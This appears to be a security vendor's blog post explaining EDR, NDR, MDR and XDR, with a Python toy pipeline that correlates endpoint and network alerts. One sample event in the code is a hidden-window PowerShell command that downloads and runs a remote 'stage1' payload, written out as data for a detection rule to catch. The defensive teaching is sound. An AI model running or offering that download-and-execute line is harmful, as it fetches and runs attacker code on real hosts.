Here’s a fun fact for you: did you know that an abbreviation is only an acronym if it can be pronounced as a word, such as ASCII, or YOLO? If the initials are pronounced separately, then the correct term is ‘initialism’. ‘That’s absolutely intriguing,’ you may think to yourself (all right; maybe I’m playing criminally fast and loose with the word ‘intriguing’, especially when I was already on perilously thin ice with the word ‘fun’), ‘but what does that have to do with IT?’ Well, aside from the term ‘IT’ being an initialism itself, the industry as a whole is a seething mass of them.
Specifically, there are four that we’re going to be looking at here. Four that are very often intertwined, but still distinct; in short, the perfect recipe for confusion. That’s right; we’re looking at EDR, NDR, MDR and XDR.
EDR and NDR
To simplify things as much as possible, we’re going to break things down a little further. In essence, EDR and NDR are the primary detection and response toolsets and carry out the same basic functions – collecting telemetry, analysing it for signs of attack, and enabling a response – what really differentiates them is where in an organisation’s network they collect that telemetry.
Let’s start with Endpoint Detection and Response, or EDR. In many ways, this is the bread and butter of most IT security infrastructures. Endpoints are the doors to an organisation’s network. That wasn’t so concerning in the past, but the number of endpoints keeps growing (and this is no longer limited to laptops: phones, tablets, literally anything that can connect to the network counts). The more doors the network has, the more important it becomes to invest in a decent set of locks.
Scaling things up slightly from doors to a house: if your network is a high security building, then the perimeter of that building is defined by the devices on it, and EDR functions as the watchtowers along the perimeter wall, detecting and blocking malicious activity. In practice this means an agent installed on each endpoint that continuously records what happens there (processes started, files and registry keys changed, network connections opened, logons) and streams that telemetry to a central platform, where it is analysed in real time so that threats can be diagnosed quickly. This works in tandem with automated response actions, such as killing a malicious process or isolating the affected host from the network, in order to detect and contain threats and protect the network against infiltration.
Whereas EDR monitors activity on the devices themselves, Network Detection & Response – or NDR – monitors the traffic between them. EDR tools are ideal for spotting and mitigating malicious activity on managed endpoints, but they only see hosts on which an agent can be installed. With networks becoming ever more complex, perimeters expanding far beyond the office environments of the past, and a growing population of devices that can’t run an agent at all (printers, IP cameras, network appliances, personal devices), EDR alone is not equipped to manage every eventuality. Conditions are ideal for attackers to sneak in and move laterally within the network, or to lie in wait in its dark corners for an opportune moment to strike.
Returning to the analogy of EDR as watchtowers on the walls of a high security building, think of NDR as installing floodlights inside them. Working from a copy of the traffic (a network tap, a SPAN port, or flow records exported by switches), and using techniques like machine learning and behavioural analytics, NDR watches the traffic between devices on the network and alerts security teams to unusual behaviour, such as a workstation suddenly reaching dozens of internal hosts on file-sharing or remote-desktop ports. That greatly increases visibility, shrinks the blind spots left by agentless devices, and massively reduces the number of places in which malicious actors can hide. One caveat: much of today’s internal traffic is encrypted, so NDR leans on connection metadata (who talked to whom, when, how much, on which ports) rather than on payload inspection.
MDR and XDR
To quote John Cleese in Monty Python, ‘and now for something completely different’. Well, actually, not that different, but who’s going to turn down a semi-decent opportunity for a Monty Python reference? In fact, the base toolsets utilised by MDR and XDR are not functionally dissimilar from EDR and NDR – what separates MDR and XDR is that they take a slightly different approach to how those tools are used.
The ability to detect and contain threats is the priority when it comes to protecting your network, but the evolving cybersecurity landscape doesn’t just present problems in terms of the network perimeter. Many IT teams are understaffed, struggling to build the skillsets needed to keep up with the technology they’re deploying, or simply too overwhelmed by security alerts to know what to prioritise. You could have deployed the most advanced security stack in the world, but if the humans operating it don’t have the capacity to use it well, you’ve got the technological equivalent of a very expensive paperweight.
Unlike the other tools mentioned, MDR is a managed service, not a technology – hence Managed Detection & Response. MDR builds on the foundation of EDR (and often NDR or other telemetry), combining the technology with a provider’s analysts, typically working around the clock, to triage, prioritise and respond to threats on your behalf. Not only does this significantly reduce the workload on in-house IT security teams, it also helps ensure that the security tools you already have are being used to their full potential. The practical caveat is scope: agree up front which response actions the provider may take unasked (isolating a host, disabling an account) and which need your sign-off.
If you’ve been following our LinkedIn page for any length of time, you’ve surely heard Cynet’s song (if not, we can wait while you have a listen, and you can thank us later). But sure-fire number one hits aside, what is XDR? Put simply, Extended Detection and Response is the evolution of EDR and NDR. MDR helps to compensate for human limitation, but human limitation isn’t always the problem. Let’s go back to that most advanced security stack in the world; chances are it’s going to be made up of multiple different tools which may work together, but aren’t necessarily talking to each other, leaving your IT team to effectively mediate between them.
XDR is a holistic approach which extends the capabilities of EDR beyond the endpoint to give visibility across the whole network and security stack, effectively rolling EDR and NDR into one and, in most products, pulling in identity, email and cloud telemetry as well. It then correlates the events from those sources (an endpoint alert and a network alert about the same host become one incident rather than two tickets), prioritises the result and presents it in a single console, streamlining the whole process and allowing your IT teams to respond more effectively to threats.
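To make the three layers concrete, here is an added example (mine, not code from this page or from any vendor named on it) that runs a toy EDR rule over constructed process-creation events, a toy NDR rule over constructed flow records, and then performs XDR-style correlation of the two into a single prioritised incident list; it illustrates the EDR and NDR passages above as well as this one. Hostnames, IP addresses, thresholds and the set of agent-managed hosts are all assumptions, and the severity scores and the "agent vs. network" containment choice are illustrative, not any product's logic.

```python
"""Toy detection pipeline: EDR rule over process telemetry, NDR rule over flow
records, and XDR-style correlation of the two into prioritised incidents.
All data below is constructed for the example."""
from collections import defaultdict

# Process chain an EDR rule typically flags: an Office application spawning a script host.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
# Ports commonly used for lateral movement inside a Windows network: SMB, RDP, WinRM.
LATERAL_PORTS = {445, 3389, 5985}
FANOUT_THRESHOLD = 5    # distinct internal targets from one source ...
WINDOW = 60             # ... within this many seconds
# Hosts that have an EDR agent installed (assumption: the IP camera cannot run one).
AGENT_HOSTS = {"ws-12", "ws-07", "srv-01"}

# Constructed endpoint telemetry: process-creation events as an EDR agent would report them.
ENDPOINT_EVENTS = [
    {"host": "ws-12", "ts": 100, "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient)'
                ".DownloadString('http://198.51.100.7/stage1')\""},
    {"host": "ws-12", "ts": 101, "parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe"},
    {"host": "ws-07", "ts": 102, "parent": "OUTLOOK.EXE", "image": "excel.exe",
     "cmdline": "excel.exe /e budget.xlsx"},
    {"host": "srv-01", "ts": 103, "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# Constructed network telemetry: flow records as an NDR sensor sees them on a tap/SPAN port.
NETWORK_FLOWS = (
    [{"src": "ws-12", "dst": f"10.0.0.{n}", "dport": 445, "ts": 120 + i}
     for i, n in enumerate(range(11, 17))]                            # 6 shares in 6 seconds
    + [{"src": "ws-07", "dst": "10.0.0.20", "dport": 443, "ts": 130},
       {"src": "ws-07", "dst": "10.0.0.21", "dport": 445, "ts": 131}]  # ordinary user traffic
    + [{"src": "iot-cam-04", "dst": f"10.0.0.{n}", "dport": 3389, "ts": 200 + i}
       for i, n in enumerate(range(30, 37))]                          # agentless device probing RDP
)


def edr_detect(events):
    """EDR-style rule: flag an Office app launching a script interpreter (macro/phishing chain)."""
    alerts = []
    for e in events:
        if e["parent"].lower() in OFFICE_APPS and e["image"].lower() in SCRIPT_HOSTS:
            alerts.append({"host": e["host"], "ts": e["ts"], "source": "EDR", "severity": 8,
                           "rule": "office_spawns_script_host", "detail": e["cmdline"]})
    return alerts


def ndr_detect(flows):
    """NDR-style rule: one source reaching many distinct hosts on lateral-movement ports
    within WINDOW seconds. Works for any device on the wire, agent or not."""
    by_src = defaultdict(list)
    for f in flows:
        if f["dport"] in LATERAL_PORTS:
            by_src[f["src"]].append(f)
    alerts = []
    for src, fs in by_src.items():
        fs.sort(key=lambda f: f["ts"])
        for i, first in enumerate(fs):
            targets = {f["dst"] for f in fs[i:] if f["ts"] - first["ts"] <= WINDOW}
            if len(targets) >= FANOUT_THRESHOLD:
                alerts.append({"host": src, "ts": first["ts"], "source": "NDR", "severity": 6,
                               "rule": "lateral_fanout",
                               "detail": f"{len(targets)} targets within {WINDOW}s"})
                break   # one alert per source; don't re-raise for every later window
    return alerts


def xdr_correlate(alert_lists):
    """XDR-style correlation: merge alerts from all sensors, group by host, score and rank."""
    incidents = {}
    for alerts in alert_lists:
        for a in alerts:
            inc = incidents.setdefault(a["host"], {"host": a["host"], "sources": set(),
                                                   "score": 0, "alerts": []})
            inc["sources"].add(a["source"])
            inc["score"] += a["severity"]
            inc["alerts"].append(a)
    for inc in incidents.values():
        if len(inc["sources"]) > 1:       # independent sensors agreeing is strong corroboration
            inc["score"] += 5
        inc["priority"] = ("high" if inc["score"] >= 15
                           else "medium" if inc["score"] >= 6 else "low")
        # Containment depends on reach: an agent can isolate the host itself;
        # an agentless device can only be cut off at the network.
        inc["action"] = ("isolate_host_via_agent" if inc["host"] in AGENT_HOSTS
                         else "quarantine_network_segment")
    return sorted(incidents.values(), key=lambda i: -i["score"])


def run_pipeline(events=ENDPOINT_EVENTS, flows=NETWORK_FLOWS):
    return xdr_correlate([edr_detect(events), ndr_detect(flows)])


if __name__ == "__main__":
    for inc in run_pipeline():
        print(f"{inc['priority']:6} {inc['host']:11} sources={sorted(inc['sources'])} "
              f"score={inc['score']} action={inc['action']}")
```

Run it and both fan-out hosts appear, but only ws-12 comes out as "high": the endpoint and network sensors independently saw the same machine misbehaving, which is exactly the corroboration a single-console correlation gives you. The IP camera never shows up in the EDR feed at all because it has no agent; NDR is the only sensor that catches it, and the only containment available is at the network.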
Now that you’ve got a clearer idea of what each tool does, the next step is to decide which solution, or combination of solutions, best suits your organisation. Take a look at the security solutions we offer to learn more.